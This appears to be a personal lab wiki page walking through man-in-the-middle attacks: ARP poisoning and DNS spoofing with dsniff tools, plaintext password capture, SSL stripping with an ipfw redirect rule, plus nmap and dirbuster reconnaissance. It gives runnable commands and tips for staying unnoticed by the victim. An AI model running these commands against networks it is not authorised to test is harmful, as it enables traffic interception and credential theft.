Packet Sniffing and Recon - jonatello/lab-musing GitHub Wiki

Packet sniffing tools and MiTM techniques

Dsniff

Dsniff comes with a set of tools that can be utilized to poison ARP tables, spoof DNS, and many other things. In this example we will spoof a victim's gateway with that of our own interface, this way we can proxy all the traffic ourselves

Install the package

pkg install dsniff

Enable kernel IP forwarding

sysctl -w net.inet.ip.forwarding=1

Run arpspoof on the attacker with the victim (10.1.1.99) and gateway (10.1.1.1) specified. This should update the arp entry for the gateway on the victim (verified via "arp -a")

arpspoof -t 10.1.1.99 10.1.1.1

You can suspend this task and have it resume in the background by using CTRL+Z and then "bg %1". It will still spam the console so it might be best to open a new console for the rest

Run dnsspoof on the attacker to begin spoofing and impersonating hostnames (not specifying any will fake ALL hostnames). It's a good idea to be specific with the sites to impersonate and have a webserver up and ready to take the requests or it will be quite obvious to the victim something strange is going on.

dnsspoof

Again, you can suspend this task and have it resume in the background by using CTRL+Z and then "bg %2" (job # 2). Get your list of jobs via the "jobs" command

Run dsniff to begin sniffing for plaintext passwords, they will be saved to ~/dsniff.log

dsniff -w dsniff.log

When done, bring the previous jobs to the foreground with "fg" and end them with CTRL+C. Don't forget to disable kernel IP forwarding

sysctl -w net.inet.ip.forwarding=0

SSLSTRIP

https://moxie.org/software/sslstrip/

Install the Package

pkg install py27-sslstrip

Assuming IPFW is already configured and running, create a new rule to forwward inbound traffic on port 80 to 8080

ipfw add 00101 fwd 127.0.0.1,8080 tcp from any to any 80 in

Run sslstrip listening on port 8080, this will log to ~/sslstrip.log

sslstrip -l 8080

At this point traffic needs to be directed to our attacker via ARP or DNS (use dsniff)

Nmap

Install the package

pkg install nmap

There are many commands and options you can run Nmap with, to get a list, run nmap with no flags

nmap

A useful command to probe open ports to determine service/version info against a single host or a subnet (CIDR notation can be used) is the -sV flag along with the -oN flag for normal output

nmap -sV example.com -oN results.txt

Dirbuster

Install the package

pkg install dirbuster

Run dirbuster in headless mode (-H) with the supplied URL (-u) using one of the built-in wordlists (-l)

dirbuster -H -u https://example.com -l /usr/local/share/java/dirbuster/directory-list-1.0.txt

Unfortunately it looks like headless mode causes java.lang.NullPointerException and doesn't appear to work. Launching dirbuster with the GUI does seem to work normally.